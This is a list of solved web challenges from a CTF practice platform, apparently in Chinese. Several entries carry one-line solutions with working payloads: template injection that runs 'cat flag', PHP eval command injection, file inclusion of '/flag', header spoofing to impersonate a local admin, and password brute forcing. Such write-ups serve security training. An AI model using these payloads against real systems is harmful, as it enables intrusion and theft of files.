236. [平台] game1

分数: 15 金币: 3 已通过

通过: 8176 标签: 平台 WEB

187. [平台] 社工-初步收集

分数: 15 金币: 3 已通过

通过: 4452 标签: 平台 WEB

writeup: 查看

374. [平台] 留言板

分数: 10 金币: 3 已通过

通过: 2392 标签: 平台 WEB

writeup: 使用公用xss或自建xss平台，提交payload，接收到flag

204. [平台] Flask_FileUpload

分数: 10 金币: 3 已通过

通过: 11128 标签: 平台 WEB

writeup: 上传demo.jpg，内容为 import os\r\nos.system('cat /flag')，f12查看内容

203. [平台] Simple_SSTI_2

分数: 10 金币: 3 已通过

通过: 14983 标签: 平台 WEB

writeup: SSTI模版注入: /?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}, 再 /?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

198. [平台] 聪明的php

分数: 25 金币: 2 已通过

通过: 2958 标签: 平台 WEB

86. [平台] 速度要快

分数: 25 金币: 2 已通过

通过: 3594 标签: 平台 WEB

85. [平台] 秋名山车神

分数: 25 金币: 2 已通过

通过: 3904 标签: 平台 WEB

writeup: 查看

84. [平台] 成绩查询

分数: 25 金币: 2 已通过

通过: 8210 标签: 平台 WEB

83. [平台] 备份是个好习惯

分数: 20 金币: 2 已通过

通过: 7233 标签: 平台 WEB

writeup: 查看

82. [平台] 好像需要密码

分数: 20 金币: 2 已通过

通过: 8601 标签: 平台 WEB

writeup: burp 爆破，密码12468

81. [平台] 文件包含

分数: 20 金币: 2 已通过

通过: 10192 标签: 平台 WEB

writeup: /index.php?file=file:///flag

80. [平台] 源代码

分数: 20 金币: 2 已通过

通过: 9693 标签: 平台 WEB

writeup: 查看页面源码，将p1/p2那部分编码进行解码，得到一个checkSubmit函数，复制67d709b2b54aa2aa648cf6e87a7114f1，提交得到flag

314. [平台] bp

分数: 15 金币: 2 已通过

通过: 7798 标签: 平台 WEB

writeup: 查看

79. [平台] 本地管理员

分数: 15 金币: 2 已通过

通过: 12497 标签: 平台 WEB

writeup: 页面源码，dGVzdDEyMw==，base64解码得到test123，hackbar提交，新增header，X-Forwarded-For: 127.0.0.1 ，payload pass=test123&user=admin

78. [平台] 网站被黑

分数: 15 金币: 2 已通过

通过: 14950 标签: 平台 WEB

writeup: dirsearch 扫出来shell.php，再密码爆破，得到hack

196. [平台] Simple_SSTI_1

分数: 5 金币: 2 已通过

通过: 27864 标签: 平台 WEB

writeup: /?flag={{config}}

77. [平台] 头等舱

分数: 15 金币: 1 已通过

通过: 14897 标签: 平台 WEB

writeup: curl -I http://114.67.175.224:10352/

76. [平台] 变量1

分数: 15 金币: 1 已通过

通过: 12355 标签: 平台 WEB

writeup: 解法一：/?args=GLOBALS

75. [平台] eval

分数: 15 金币: 1 已通过

通过: 14120 标签: 平台 WEB

writeup: 解法一：/?hello=file('flag.php') 解法二：/?hello=system('cat flag.php') 解法三：/?hello=show_source('flag.php')